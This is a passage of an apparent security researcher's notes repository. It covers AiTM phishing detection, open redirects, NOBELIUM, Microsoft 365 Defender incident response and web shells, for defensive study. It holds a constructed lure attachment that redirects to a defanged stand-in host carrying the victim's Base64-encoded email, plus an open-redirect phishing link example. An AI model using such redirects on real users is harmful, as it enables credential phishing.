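    """List (idiom, destination URL, decoded e-mail or None) for each redirect found."""
    found = []
    for name, pattern in REDIRECT_PATTERNS:
        for match in pattern.finditer(html):
            url = match.group(1)
            found.append((name, url, decode_fragment_email(url)))
    return found


# Constructed lure attachment: a replace() redirect whose target ends in the
# Base64 of "jdoe@contoso.com", plus a meta-refresh fallback to the same URL.
SAMPLE_ATTACHMENT = """<html><head>
<meta http-equiv="refresh" content="5; url=hxxps://jdoe.wildcard-redirector[.]example/#amRvZUBjb250b3NvLmNvbQ==">
</head><body>
<script>
  window.location.replace("hxxps://jdoe.wildcard-redirector[.]example/#amRvZUBjb250b3NvLmNvbQ==");
</script>
</body></html>"""

if __name__ == "__main__":
    for idiom, url, email in find_redirects(SAMPLE_ATTACHMENT):
        print(f"{idiom:25} -> {url}  (victim: {email})")
```

Because a URL fragment is never sent to the server, the encoded address only exists in the link itself and in the client-side script, which is why a mail gateway that fetches the URL will not see it; tooling that inspects the raw attachment, as above, will.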
47 | 48 | **Open Redirect ?** 49 | 50 | An open redirect is a vulnerability in a web application that allows attackers to redirect users to malicious websites by manipulating URL parameters. It occurs when the application fails to validate or restrict user-supplied input used for redirection. Attackers exploit this vulnerability for phishing or other malicious purposes: a link that starts on a trusted domain and only then bounces to the phishing site is more likely to pass mail filtering and user scrutiny. 51 | 52 | ```url 53 | PHP : http://example.com/example.php?url=http://malicious.example.com 54 | ``` 55 | ```html 56 | HTML : <a href="http://example.com/example.php?url=http://malicious.example.com">Click here to log in</a> 57 | ``` 58 | 59 | > Reference - [CWE-601: URL Redirection to Untrusted Site ('Open Redirect')](https://cwe.mitre.org/data/definitions/601.html) 60 | 61 | 62 | 63 | 64 | > Open Redirect pages, [Zscaler, AiTM report](https://www.zscaler.com/blogs/security-research/large-scale-aitm-attack-targeting-enterprise-users-microsoft-email-services) 65 |
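As an added example that is not part of the original note: the CWE-601 pattern above beside a hardened version of the same `?url=` handler. The allowlisted host names and the site base URL are assumptions for illustration. The hardened check resolves the parameter against the site first, so that inputs a browser would treat as absolute (`//evil.com`, `https:evil.com`, backslashes) are judged by where the browser would actually go.

```python
# Added example (not from the original note): open-redirect validation for a
# "?url=" parameter. ALLOWED_HOSTS and the base URL are assumed values.
from urllib.parse import urljoin, urlsplit

# Hosts this application may send users to (assumed allowlist, exact match only).
ALLOWED_HOSTS = {"example.com", "login.example.com"}


def vulnerable_redirect_target(url_param):
    """The CWE-601 pattern: whatever the attacker supplies becomes the Location header."""
    return url_param


def safe_redirect_target(url_param, base="https://example.com/"):
    """Return the resolved URL when it is safe to redirect to, otherwise the site root."""
    fallback = base
    if not url_param:
        return fallback
    # Browsers normalise "\" to "/", so "/\evil.com" would become "//evil.com";
    # CR/LF would allow header injection. Reject both outright.
    if "\\" in url_param or any(ord(c) < 0x20 for c in url_param):
        return fallback
    # Resolve relative inputs against the site; absolute inputs are kept as-is.
    # This is what turns "https:evil.com" into a harmless local path.
    resolved = urljoin(base, url_param)
    parts = urlsplit(resolved)
    if parts.scheme not in ("http", "https"):
        return fallback                  # blocks javascript:, data:, etc.
    if parts.username or parts.password:
        return fallback                  # blocks https://example.com@evil.com tricks
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return fallback                  # blocks evil.com and look-alike subdomains
    return resolved


if __name__ == "__main__":
    for p in ("http://malicious.example.com", "//evil.com/login", "/account/settings"):
        print(f"{p:35} vulnerable -> {vulnerable_redirect_target(p)}")
        print(f"{'':35} hardened   -> {safe_redirect_target(p)}")
```

The exact-match allowlist matters: a suffix check such as `host.endswith("example.com")` would let `evil-example.com` and `example.com.attacker.tld` through.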
66 | 67 | **Base64** 68 | 69 | According to the Microsoft Security blog, attackers not only use URL redirection methods but also Base64-encode the end-user's email address in JavaScript, when it is present, and carry it in the fragment of the redirect URL. Because a URL fragment is never sent to the server, the encoded address is visible only to client-side script and to tooling that inspects the full link. 70 | 71 | **e.g.** Microsoft observed that the redirector page used the following URL format: 72 | ``` 73 | hxxp://[username].[wildcard domain].[tld]/#[user email encoded in Base64] 74 | ``` 75 | 76 | |JavaScript | Memo | 77 | |:----------|:-----| 78 | | btoa() | Encodes a string in base-64 | 79 | | atob() | Decodes a base-64 encoded string | 80 | > Reference - [Window btoa()](https://www.w3schools.com/jsref/met_win_btoa.asp) / [Window atob()](https://www.w3schools.com/jsref/met_win_atob.asp) 81 | 82 | 83 | 84 | > Source code of the HTML attachment, [Microsoft, AiTM report](https://www.microsoft.com/en-us/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/) 85 | 86 | 87 | 88 | 89 | ## KQL : Hunting 90 | The following documents summarize each phase of the AiTM attack with KQL queries that help in hunting potential AiTM/BEC activity. 91 | 92 | 1. [13-kql-AiTM-HuntingInsight-Part1.pdf](https://github.com/LearningKijo/KQL/blob/main/KQL-Effective-Use/13-kql-AiTM-HuntingInsight-Part1.pdf) 93 | 2. [13-kql-AiTM-HuntingInsight-Part2.pdf](https://github.com/LearningKijo/KQL/blob/main/KQL-Effective-Use/13-kql-AiTM-HuntingInsight-Part2.pdf) 94 | 3. [13-kql-AiTM-HuntingInsight-Part3.pdf](https://github.com/LearningKijo/KQL/blob/main/KQL-Effective-Use/13-kql-AiTM-HuntingInsight-Part3.pdf) 95 | 4. 
[13-kql-AiTM-HuntingInsight-Part4.pdf](https://github.com/LearningKijo/KQL/blob/main/KQL-Effective-Use/13-kql-AiTM-HuntingInsight-Part4.pdf) 96 | 97 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/cee2680e-f8be-41a0-b24f-18c0c96acfd3) 98 | 99 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/cec632df-c9f7-4a74-b0a4-11eea8ef5d72) 100 | 101 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/79617151-c385-4bf9-8b04-ea57a24318db) 102 | 103 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/462a2a68-c945-4e58-8e37-b3de6bb4659d) 104 | 105 | ## MS security blogs : AiTM attack timeline 106 | 107 | - July 12, 2022, [From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud](https://www.microsoft.com/en-us/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/) 108 | - November 16, 2022, [Token tactics: How to prevent, detect, and respond to cloud token theft](https://www.microsoft.com/en-us/security/blog/2022/11/16/token-tactics-how-to-prevent-detect-and-respond-to-cloud-token-theft/) 109 | - March 13, 2023, [DEV-1101 enables high-volume AiTM campaigns with open-source phishing kit](https://www.microsoft.com/en-us/security/blog/2023/03/13/dev-1101-enables-high-volume-aitm-campaigns-with-open-source-phishing-kit/) 110 | - June 8, 2023, [Detecting and mitigating a multi-stage AiTM phishing and BEC campaign](https://www.microsoft.com/en-us/security/blog/2023/06/08/detecting-and-mitigating-a-multi-stage-aitm-phishing-and-bec-campaign/) 111 | 112 | ## MS blogs : AiTM attack insights 113 | - Jul 31, 2023, [AiTM & BEC threat hunting with KQL](https://techcommunity.microsoft.com/t5/azure-data-explorer-blog/aitm-amp-bec-threat-hunting-with-kql/ba-p/3885166) 114 | - Sep 19, 2023, [A day in the life of a Defender Experts for XDR 
analyst](https://techcommunity.microsoft.com/t5/microsoft-security-experts-blog/a-day-in-the-life-of-a-defender-experts-for-xdr-analyst/ba-p/3932140) 115 | 116 | ## Other blogs 117 | - August 02, 2022, [Large-Scale AiTM Attack targeting enterprise users of Microsoft email services](https://www.zscaler.com/blogs/security-research/large-scale-aitm-attack-targeting-enterprise-users-microsoft-email-services) (Zscaler) 118 | - August 09, 2022, [AitM Phishing Attack Targeting Enterprise Users of Gmail](https://www.zscaler.jp/blogs/security-research/aitm-phishing-attack-targeting-enterprise-users-gmail) (Zscaler) 119 | - November 09, 2022, [Trellix Insights: Large-Scale AiTM Attack Targeting Enterprise Users](https://kcm.trellix.com/corporate/index?page=content&id=KB96139&locale=en_US) (Trellix) 120 | 121 | #### Disclaimer 122 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 123 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day02-APT29-Part3-Midnight-Blizzard.md: -------------------------------------------------------------------------------- 1 | # Day 2 - APT29, Midnight Blizzard (NOBELIUM) 2 | > 📢 April 18, 2023 - Microsoft has changed its naming taxonomy for threat actors, moving away from using element symbols to using [weather-related names](https://www.microsoft.com/en-us/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/). The actor tracked as APT29, which Microsoft previously called NOBELIUM, is named Midnight Blizzard in the new taxonomy. In this blog, I will use the name "NOBELIUM" instead of Midnight Blizzard. 3 | 4 | 5 | ## What is NOBELIUM? 6 | NOBELIUM is a Russian state-sponsored hacking group that conducts cyber espionage and attacks against various targets. Other vendors track it as APT29 or Cozy Bear, and it is responsible for high-profile attacks such as **the SolarWinds hack**. 
7 | 8 | According to ***Microsoft Security blog update***, 9 | > Microsoft continues to work with partners and customers to expand our knowledge of the threat actor behind the nation-state cyberattacks that compromised the supply chain of SolarWinds and impacted multiple other organizations. Microsoft previously used **‘Solorigate’ as the primary designation for the actor**, but moving forward, we want to place appropriate focus on the actors behind the sophisticated attacks, rather than one of the examples of malware used by the actors. **Microsoft Threat Intelligence Center (MSTIC) has named the actor behind the attack against SolarWinds, the SUNBURST backdoor, TEARDROP malware, and related components as NOBELIUM.** As we release new content and analysis, we will use NOBELIUM to refer to the actor and the campaign of attacks. 10 | 11 | #### Key words of NOBELIUM 12 | SolarWinds, the SUNBURST backdoor, TEARDROP malware, Supply chain attack, Solorigate 13 | 14 | ## NOBELIUM Attack Chain 15 | The attackers added malicious code to the SolarWinds Orion Platform DLL file, which was distributed as part of a software update. The DLL file was digitally signed, indicating that the attackers had access to the company's software development and distribution pipeline. The malicious code created a backdoor, which allowed the attackers to operate in compromised networks without being detected. The backdoor was designed to blend in with the rest of the code, making it difficult to spot. The attackers used a lengthy list of functions and capabilities to perform a wide range of actions, including reconnaissance, privilege escalation, and lateral movement. The attackers took many steps to maintain a low profile, such as using unique subdomains for each affected domain to evade detection. 
16 | 17 | ![image](https://user-images.githubusercontent.com/120234772/230338300-734224cb-f248-47df-8472-18aaa4f0c662.png) 18 | > [Microsoft Security Blog](https://www.microsoft.com/en-us/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/), NOBELIUM infection chain 19 | 20 | #### The initial process 21 | 1. The SolarWinds.BusinessLayerHost.exe file is a legitimate file used by the SolarWinds Orion IT management software. 22 | 2. The malicious activity was not directly caused by the executable file, but rather by a compromised DLL file (SolarWinds.Orion.Core.BusinessLayer.dll) that was loaded into the executable. 23 | 3. The attackers were able to insert the malicious code into the DLL file during an early stage of the software build, before the final stages that would include digitally signing the compiled code. 24 | 4. The compromised DLL file is digitally signed with SolarWinds' legitimate certificate, so it passes signature checks and looks like a trusted component, which helps it avoid detection. 25 | 5. The malicious code is designed to be lightweight and run in the background, so as not to interfere with the normal operation of the SolarWinds software. 26 | 6. Once the malicious code is loaded, it allows the attackers to perform a wide range of actions and move laterally across the network, with the ultimate goal of achieving their objectives, which in NOBELIUM's case was cyber espionage. 27 | 28 | ## Incident Response, Containment 29 | ### What if your environment is compromised by APT29 (Nobelium)? 30 | If your environment has been compromised by the Nobelium attack, the first step you should take is **"Containment"**. 
31 | Regarding "Containment", if you are using Microsoft Security solutions such as Microsoft Defender for Endpoint (MDE) or Microsoft Defender for Identity (MDI), then take the following actions: 32 | - [Isolate devices from the network](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#isolate-devices-from-the-network) (for devices onboarded to MDE) 33 | - [Contain devices from the network](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#contain-devices-from-the-network) (for unmanaged devices: onboarded devices block traffic to and from the contained device) 34 | - [Reset user account password](https://learn.microsoft.com/en-us/defender-for-identity/remediation-actions) 35 | - [Disable AD user / Azure AD user](https://learn.microsoft.com/en-us/defender-for-identity/remediation-actions) 36 | 37 | If you are not using Microsoft Security solutions, then take the following actions: 38 | - Immediately isolate the affected device 39 | - Reset passwords or decommission the accounts 40 | 41 | ![image](https://user-images.githubusercontent.com/120234772/230063443-8b3f59d1-d3b5-4e69-b667-c7b8e7c2ea21.png) 42 | > NIST 800-61 response management phases 43 | After the containment, move to the investigation and recovery. 44 | 45 | ## Preparing for NOBELIUM 46 | These are **key messages** from Microsoft Defenders. 47 | 48 | #### Prioritize cyber hygiene 49 | - Vulnerability management & Patching 50 | - Zero Trust implementation 51 | - Protect your identity, e.g. 
Enable MFA 52 | - Use secure devices for critical tasks 53 | 54 | #### Secure your distributed estate 55 | - Zero Trust implementation 56 | - Deploy monitoring tooling such as SIEM, XDR and EDR 57 | 58 | #### Plan for your response 59 | - Collect data for further investigation 60 | - Leverage Threat Intelligence for the investigation 61 | - Practice and train incident response, specifically for APT29-style intrusions 62 | - Prepare an incident response plan 63 | - Prepare a recovery plan 64 | 65 | 66 | ### Decoding NOBELIUM video: 67 | 1. [Decoding NOBELIUM: When nation-states attack (Episode 1)](https://www.youtube.com/watch?v=VVKT8NehO_c) 68 | 2. [Decoding NOBELIUM: The hunt for a global threat (Episode 2)](https://www.youtube.com/watch?v=VVbSYr1cPEE) 69 | 3. [Decoding NOBELIUM: Countermeasures (Episode 3)](https://www.youtube.com/watch?v=fS97PC4FLCc) 70 | 4. [Decoding NOBELIUM: After-action report (Episode 4)](https://www.youtube.com/watch?v=wFtGD7p58cQ) 71 | 72 | 73 | ## Reference 74 | ### Microsoft Security blog - NOBELIUM : 75 | December 15, 2020, [Ensuring customers are protected from Solorigate](https://www.microsoft.com/en-us/security/blog/2020/12/15/ensuring-customers-are-protected-from-solorigate/)
76 | December 18, 2020, [Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack....](https://www.microsoft.com/en-us/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)
77 | December 28, 2020, [Using Microsoft 365 Defender to protect against Solorigate](https://www.microsoft.com/en-us/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/)
78 | January 20, 2021, [Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop](https://www.microsoft.com/en-us/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/)
79 | March 4, 2021, [GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence](https://www.microsoft.com/en-us/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/)
80 | May 27, 2021, [New sophisticated email-based attack from NOBELIUM](https://www.microsoft.com/en-us/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/)
81 | May 28, 2021, [Breaking down NOBELIUM’s latest early-stage toolset](https://www.microsoft.com/en-us/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/)
82 | September 27, 2021, [FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor](https://www.microsoft.com/en-us/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/)
83 | October 25, 2021, [NOBELIUM targeting delegated administrative privileges to facilitate broader attacks](https://www.microsoft.com/en-us/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/)
84 | February 8, 2023, [Solving one of NOBELIUM’s most novel attacks: Cyberattack Series](https://www.microsoft.com/en-us/security/blog/2023/02/08/solving-one-of-nobeliums-most-novel-attacks-cyberattack-series/) 85 | 86 | 87 | ### Decoding NOBELIUM blog : 88 | 1. [How nation-state attackers like NOBELIUM are changing cybersecurity](https://www.microsoft.com/en-us/security/blog/2021/09/28/how-nation-state-attackers-like-nobelium-are-changing-cybersecurity/) 89 | 2. [The hunt for NOBELIUM, the most sophisticated nation-state attack in history](https://www.microsoft.com/en-us/security/blog/2021/11/10/the-hunt-for-nobelium-the-most-sophisticated-nation-state-attack-in-history/) 90 | 3. [Behind the unprecedented effort to protect customers against the NOBELIUM nation-state attack](https://www.microsoft.com/en-us/security/blog/2021/12/02/behind-the-unprecedented-effort-to-protect-customers-against-the-nobelium-nation-state-attack/) 91 | 4. [The final report on NOBELIUM’s unprecedented nation-state attack](https://www.microsoft.com/en-us/security/blog/2021/12/15/the-final-report-on-nobeliums-unprecedented-nation-state-attack/) 92 | 93 | #### Disclaimer 94 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 95 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day10-XDR-Insights-part2.md: -------------------------------------------------------------------------------- 1 | # Day 10 - XDR Incident Investigation insights 2 | When organizations purchase E5 security, their first challenge is often product deployment. However, ***the next significant challenge arises in "security operations"***, particularly dealing with daily incident response. While Microsoft provides detailed insights and various features, SOC teams might feel overwhelmed when alerts and incidents are generated in their environment. 
3 | 4 | When alerts or incidents are generated in your tenant, you may have the following concerns and challenges. 5 | 6 | 1. ***No idea where to start the investigation...*** 7 | 2. ***Where exactly do I have to look ?*** 8 | 3. ***What kind of options do I have ?*** 9 | 4. ***What capabilities can I leverage in XDR ?*** 10 | 11 | 12 | In light of this, I aim to expand understanding of ***XDR*** and ***Microsoft 365 Defender*** to help SOC teams overcome these challenges. 13 | Therefore, in this blog series, I am going to explore the power of XDR and Microsoft 365 Defender. 14 | 15 | | # | Title | About | 16 | |:-----|:----- |:------| 17 | |1 | [XDR overview](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day9-XDR-Insights-part1.md) | This blog is for people who are not aware of XDR.
It aims to start the journey of exploring XDR, specifically Microsoft 365 Defender. | 18 | |2 | XDR Incident Investigation ****** | This blog focuses on Incident Response in the Microsoft 365 Defender portal.
Part 1 covers the fundamentals, while ***Part 2 delves into core incident investigation.*** | 19 | 20 | 21 | ## Incident Investigation in Microsoft 365 Defender 22 | 23 | To effectively utilize Microsoft 365 Defender, please keep in mind the following two concepts when you receive alerts and incidents in your tenant. 24 | 25 | | # | Step | ToDo | 26 | |:-----|:------------|:------------------------------------------------------------| 27 | | 1 | Investigate | - Contain compromised assets
- Investigate incidents | 28 | | 2 | Response | - Eradication & Recovery
- Extend investigation | 29 | 30 | 31 | ### 1. Investigate 32 | When alerts/incidents were generated in your tenant, firstly what you have to do is to understand ***a holistic view of the generated incident***. 33 | - [ ] Confirm how and where the attack started. 34 | - [ ] How far the attack has gone into your tenant. 35 | - [ ] Identify & Contain compromised assets, such as devices, users, mailboxes, apps and more. 36 | 37 | 38 | > [!Warning] 39 | > Instead of looking at the alert page initially, focus on ***the incident page***. This is because numerous alerts may not be mapped as a single incident, potentially overwhelming the SOC team. 40 | 41 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/7df02513-bc93-430b-8aac-a4f57b4287fb) 42 | 43 | #### @ Confirm how and where the attack started ? 44 | #### @ How far the attack has gone into your tenant ? 45 | 46 | When it comes to **"Investigation"**, it's important to grasp a holistic view of the generated incident. 47 | ***In other words, you don't need to deeply understand the detailed information of processes, files, registries, and device activities originating from individual alerts at this stage.*** 48 | This provides preliminary and useful information before proceeding with actions in the containment process. 49 | 50 | The following are important checkpoints to understand the holistic view of the incident. 51 | 52 | 53 | | Points | Details | 54 | |:---------------|:------------| 55 | | Incident Title |Title is the primary element that helps you upon opening an incident. It assists in grasping a concise overview of the incident. For instance, 'Multi-stage incident involving initial access & Command and Control on Multiple endpoints.' 
This title helps you envision a scenario where two attack techniques are observed on multiple devices.| 56 | | Alerts |This is the best place for tracking the timeline of alerts within the incident, particularly when investigating the breach's initiation. These alerts offer insights into the initial stages of the breach, including details about how and where the compromise originated.| 57 | | Incident graph |The incident graph visualizes the relationships between the alerts in the incident and the entities (devices, users, mailboxes, files) linked to those alerts. Viewing it alongside the incident title and the alert list helps you understand the overall picture of what is happening within the incident. | 58 | 59 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/e8baebb1-9f61-4cd3-9e21-b45e2f42db84) 60 | > Incidents page -> [Attack story] 61 | 62 | 63 | | Points | Details | 64 | |:----------------------|:------------| 65 | | Alerts and categories | Alerts and categories provide you not only with alerts in chronological order, but also with MITRE ATT&CK tactics. Thanks to MITRE ATT&CK, the SOC team can envision the scope of this attack and more, including how it has spread across different areas.| 66 | | Scope | Within the scope, this provides information about impacted assets, such as devices, user accounts, mailboxes, and applications. This information aids in determining the subsequent steps, such as containment to stop the ongoing attack and mitigate its impact.| 67 | 68 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b6343960-d273-4c1f-855d-c747a2e8390f) 69 | 70 | > Incidents page -> [Summary] 71 | 72 | #### @ Identify & Contain compromised assets, such as devices, users, mailboxes, apps and more 73 | Once you find the compromised asset, you have to take containment actions to stop the ongoing attack. 
I have summarized several containment-related actions within Microsoft 365 Defender as follows. 74 | 75 | | Asset | Action | 76 | |:--------|:--------| 77 | | Devices | - [Initiate Live Response Session](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/live-response?view=o365-worldwide)
- ***[Isolate Device](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#isolate-devices-from-the-network)***
- ***[Contain Device](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#contain-devices-from-the-network)*** | | 78 | | User Accounts | [- Suspend user in Azure AD
- Disable user in Active Directory
- Reset user password](https://learn.microsoft.com/en-us/defender-for-identity/remediation-actions) | 79 | 80 | > [!Important] 81 | > #### Automatic attack disruption 82 | > While the above actions are performed manually, in cases where advanced attacks such as AiTM, BEC, and Human-operated ransomware are detected in Microsoft 365 Defender, the [Automatic attack disruption feature](https://learn.microsoft.com/en-us/microsoft-365/security/defender/automatic-attack-disruption?view=o365-worldwide) designed for containment will help you stop the ongoing breach. 83 | > #### Automated investigation and response (AIR) 84 | > As [AIR](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide) is enabled by default, certain alerts & incidents will be automatically investigated and remediated. This process is primarily triggered when an alert is detected in your tenant, but there is also a manual option. If needed, you can initiate AIR. 85 | 86 | 87 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/3379a4c5-7a86-45fb-9176-88344aceefe5) 88 | > e.g. Device actions 89 | 90 | 91 | Isolating the device from the network is critical to minimize the impact on the endpoint. MDE isolation keeps the device's connection to the Defender for Endpoint service, so once the rest of its network access is cut off the SOC team can allocate time for in-depth investigation (including Live Response) and proceed with eradication tasks, such as removing malicious files, deleting registry keys, terminating processes, and more. 92 | 93 | Resetting passwords is a highly effective method to prevent unauthorized access by attackers. Additionally, disabling Azure AD user accounts and on-premises AD accounts is a powerful action that effectively cuts off access to their associated resources. Note that access tokens already issued to the attacker remain valid until they expire, so revoke the user's sessions as well rather than relying on the password reset alone. 
94 | 95 | **Custom detection rules** 96 | 97 | While this topic may slightly differ from containment in incident response, I also want to introduce the concept of [custom detection rules](https://learn.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide). 98 | If there are specific activities ***you wish to monitor or track***, you can write a KQL query in Advanced Hunting and create custom detection rules. 99 | An advantageous aspect is that when the rule (KQL query) corresponds to matched data within your tenant's activities, it can trigger actions aimed at the relevant asset. 100 | 101 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/a0903dcf-d9ad-494f-b07f-35cb48c737ba) 102 | > KQL query -> custom detection rules in Advanced Hunting 103 | 104 | 105 | > [!Note] 106 | > In the beginning, we usually initiate the process of identifying the incident to classify whether it is a false positive or true positive. If it is indeed a true positive, we delve into the incident to gain a comprehensive overview and identify compromised assets before moving on to containment. Following containment, we isolate or shut down the asset to halt the ongoing attack. The subsequent steps involve further investigation, eradication, remediation, and more. I hope I can share a story about further investigation and eradication in the next part of the blog. 
107 | 108 | ## Reference 109 | - [Incident response with Microsoft 365 Defender | Overview](https://learn.microsoft.com/en-us/microsoft-365/security/defender/incidents-overview?view=o365-worldwide) 110 | - June 10, 2020, [Inside Microsoft 365 Defender: Attack modeling for finding and stopping lateral movement](https://www.microsoft.com/en-us/security/blog/2020/06/10/the-science-behind-microsoft-threat-protection-attack-modeling-for-finding-and-stopping-evasive-ransomware/) 111 | - June 18, 2020, [Inside Microsoft 365 Defender: Mapping attack chains from cloud to endpoint](https://www.microsoft.com/en-us/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/) 112 | - July 9, 2020, [Inside Microsoft 365 Defender: Correlating and consolidating attacks into incidents](https://www.microsoft.com/en-us/security/blog/2020/07/09/inside-microsoft-threat-protection-correlating-and-consolidating-attacks-into-incidents/) 113 | - July 29, 2020, [Inside Microsoft 365 Defender: Solving cross-domain security incidents through the power of correlation analytics](https://www.microsoft.com/en-us/security/blog/2020/07/29/inside-microsoft-threat-protection-solving-cross-domain-security-incidents-through-the-power-of-correlation-analytics/) 114 | 115 | #### Disclaimer 116 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 117 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day08-WebShell-Insights-XDR.md: -------------------------------------------------------------------------------- 1 | # Day 8 - Web shell attack insights 2 | Web shell is a malicious software tool that hackers use to gain unauthorized access to a website or web server. It is like a "backdoor" that allows them to control and manipulate the website remotely. 
3 | 4 | Once the hackers have installed a web shell on a website, they can perform various malicious activities as follows. 5 | - Upload, download, and modify files on the website 6 | - Execute commands on the server in the security context of the web server's service account 7 | - Steal sensitive information from the website or server 8 | - Deface the website by changing its appearance 9 | - Launch additional attacks or use the compromised server for illegal activities 10 | 11 | **MITRE ATT&CK** 12 | 13 | Persistence > Server Software Component, ***T1505.003, [Web Shell](https://attack.mitre.org/techniques/T1505/003/)*** 14 | 15 | ### Web shell diagram 16 | 17 | 18 | > [!Note] 19 | > Web shell attacks are on the rise worldwide. Join this session with Microsoft Security Research to investigate a real-world web shell attack, and how Threat Protection security solutions from Microsoft detect and respond to it. 20 | > 21 | > [Web shell attack deep dive](https://www.youtube.com/watch?v=jvGUahJGJnY), Microsoft Security 22 | 23 | ### Programming language 24 | A web shell is malicious code implanted on a web server, written in whatever language the server will execute, such as ... 25 | 26 | ***ASP, PHP, JSP,*** Python, Perl, Bash 27 | 28 | ### Entry points (web shell installation) 29 | Web Shells are installed through: 30 | 31 | 1. Exploiting ***vulnerabilities*** on Internet-facing web servers. 32 | 2. Exploiting ***misconfigurations or weak configurations*** on Internet-facing web servers. 33 | 34 | **E.g.** SQL injection, Cross-site scripting (XSS), Local File Inclusion (LFI), Remote file inclusion (RFI), unrestricted file upload, ***Unpatched Internet-facing web servers*** 35 | 36 | ## Web Shell breach 37 | Web shells are commonly leveraged by attackers for initial access and persistence in various types of attacks. Let me introduce some attack scenarios involving the use of web shells. 
38 | 39 | ### BlackByte ransomware 40 | In this attack, the attacker utilized a variety of tools and techniques to carry out their objective of deploying BlackByte 2.0 ransomware. They gained initial access by exploiting [ProxyShell vulnerabilities](https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705) on unpatched Microsoft Exchange Servers to install the web shell. 41 | 42 | **ProxyShell** : refers to three Exchange vulnerabilities, reported by Orange Tsai of DEVCORE and patched by Microsoft in 2021. When chained, these flaws enable unauthenticated remote code execution, granting attackers full control over the Exchange server and potential access to other parts of the organization's network. 43 | 44 | | CVE | MSRC - Microsoft Exchange Server | NVD / NIST | 45 | |:---------------|:-------|:----------| 46 | | CVE-2021-34473 | [Remote Code Execution Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473) | [CVE-2021-34473 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-34473) | 47 | | CVE-2021-34523 | [Elevation of Privilege Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523) | [CVE-2021-34523 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-34523) | 48 | | CVE-2021-31207 | [Security Feature Bypass Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207) | [CVE-2021-31207 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-31207) | 49 | 50 | 51 | 52 | > July 6, 2023, [The five-day job: A BlackByte ransomware intrusion case study](https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/) 53 | 54 | ### Cadet Blizzard 55 | Cadet Blizzard, a Russian GRU-sponsored threat group, carried out attacks on several government agencies in Ukraine in mid-January 2022, causing significant disruptions and destructive events. 
